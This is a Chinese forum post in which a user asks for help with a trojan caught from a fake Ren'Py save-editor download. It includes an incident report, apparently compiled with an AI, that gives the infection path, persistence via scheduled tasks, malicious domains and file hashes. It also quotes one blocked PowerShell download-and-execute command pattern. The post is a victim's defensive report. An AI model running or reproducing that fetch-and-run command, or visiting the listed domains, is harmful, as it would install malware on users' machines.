发现疑似木马病毒,如何处理
本帖最后由 无意义·代码 于 2026-6-13 02:37 编辑简单来说就是我前几天乱下软件没看网址被木马骚扰了,我使用AI对完整事件进行了汇总:
恶意软件完整事件报告(RenEngine 加载器变种)
一、感染途径(用户操作回顾)
用户因需要 Ren'Py 游戏的存档修改器,通过以下步骤接触并运行了恶意文件:
访问钓鱼/诱导页面
用户通过百度搜索打开了第一条网页链接:
该页面内容伪装成正常分享页,提供一个下载链接:(短链接服务)
点击短链接后,最终跳转至:
假冒 MEGA 网盘页面
域名 pulse.omnidataflow5.cyou 加载了一个伪造的 MEGA 网盘界面。
页面顶部显示“MEGA”、“MEGA Transfer”、“End-to-end encrypted”、“Your file is ready”以及密码提示“Password: 7929”。
用户截图确认该页面并非真实 MEGA 官方服务。
下载恶意文件
文件名:renpy save game editor.zip
解压密码:7929
解压后得到一个可执行文件:renpy save game editor.exe,体积约 799 MB
注:用户曾使用百度搜索关键词“Renpy Save Game Editor”,但百度搜索结果本身未发现问题。真正的恶意链接来源于上述 Sway 页面及短链跳转。
二、运行恶意程序后的行为
用户运行 renpy save game editor.exe 后观察到:
程序无正常反应:没有打开任何窗口或显示正常的软件界面(类似假死或后台静默运行)。
安全软件告警:电脑管家弹出提示“检测到系统注册表敏感操作”,用户当时点击了“允许”未发现反应,直接删除了程序和后续生成的程序。
后续异常现象:
电脑再次开机后开始每隔约25分钟自动弹出广告窗口
每次开机登录后也会弹出相同广告
暂未观察到其他风险问题
三、火绒安全查杀发现
用户安装并使用火绒安全进行快速扫描,结果如下:
项目
详细信息
风险类型
木马病毒 Trojan/BAT.Pwrsch.fa
恶意计划任务
sched://TaskScheduler\VdsinaServiceID{7D84-2EE5-0B75-F62D-68B94C30D27CE80}
手动打开任务计划程序(taskschd.msc)确认:
任务名称:VdsinaServiceID{7D84-2EE5-0B75-F62D-68B94C30D27CE80}
操作:启动 conhost.exe 并执行 mshta.exe (未知广告链接)
触发器:
一次性触发(首次创建于 2026/6/10 14:20)
登录时触发
每隔 25分钟 重复一次,持续 760天
火绒安全日志(2026/6/13)仍显示:
text
powershell.exe -ep Bypass -Command irm (未知链接)\iex
被火绒网络防护 阻止(恶意网址拦截)。
同时 svchost.exe 也尝试访问同一域名。
腾讯电脑管家
初次运行恶意程序时弹出“注册表敏感操作”提示(用户允许)。
后续静态扫描未报毒全程未扫描出危险可疑操作。
360安全卫士(极速版)
检测到另一个变种计划任务:
\VdsinaServiceID{A305-114B-4E26-DB25-3E0553BB11B1554}
关联 powershell.exe,建议禁止自启动。
关联 powershell.exe,建议禁止自启动。
四、当前残留问题
尽管已删除部分计划任务,火绒日志持续拦截 powershell.exe 外联 vdsina.vg,表明系统中仍有隐藏组件(可能是未被清理的计划任务、WMI 事件订阅、注册表启动项或服务)在反复触发恶意命令。
使用电脑管家火绒和360杀毒扫描EXE程序均未发现可疑问题
五、样本 SHA‑256(供入库)
文件
SHA‑256
renpy save game editor.zip(密码 7929)
5CEAAEE4067AD255D2BB54DC5552B94A94A9EC0FB4B33F83A60238070DAA99B1
renpy save game editor.exe
C87B39B0947EF4C8150F040196E53ED905A03DEEBF20444A57A8678E0110B07F6
六、其他 IOC
恶意域名:pulse.omnidataflow5.cyou、shoxet.com、vdsina.vg
钓鱼 Sway 页面:(不允许发布链接)
计划任务名称模式:VdsinaServiceID{...}(存在多个不同 GUID)
七、用户已采取措施
使用火绒删除已发现的一个计划任务及关联 DLL。
使用360极速版检测并处理另一个变种任务。
向百度搜索引擎进行相关网址的病毒木马行为举报。
在另一台安全设备上修改重要账户密码(邮箱、Steam、网银等)。
导出安全日志,保留样本,向安全软件官方渠道进行反馈。
八、请求协助分析
分析上述样本,补充特征入库。
提供针对 powershell.exe 持续外联 vdsina.vg 的彻底清理方案(怀疑有隐藏的 WMI 订阅或服务残留)。
报告整理人:受感染用户
无法上传原疑似木马文件压缩包附件(提示文件过大)
已上传疑似钓鱼网页HTML格式网页快照(不知是否成功) 您好,您可以加下方企微,工作人员帮您看下https://p0.ssl.qhmsg.com/t11e3f4274f0060d25459ef8056.png
页:
[1]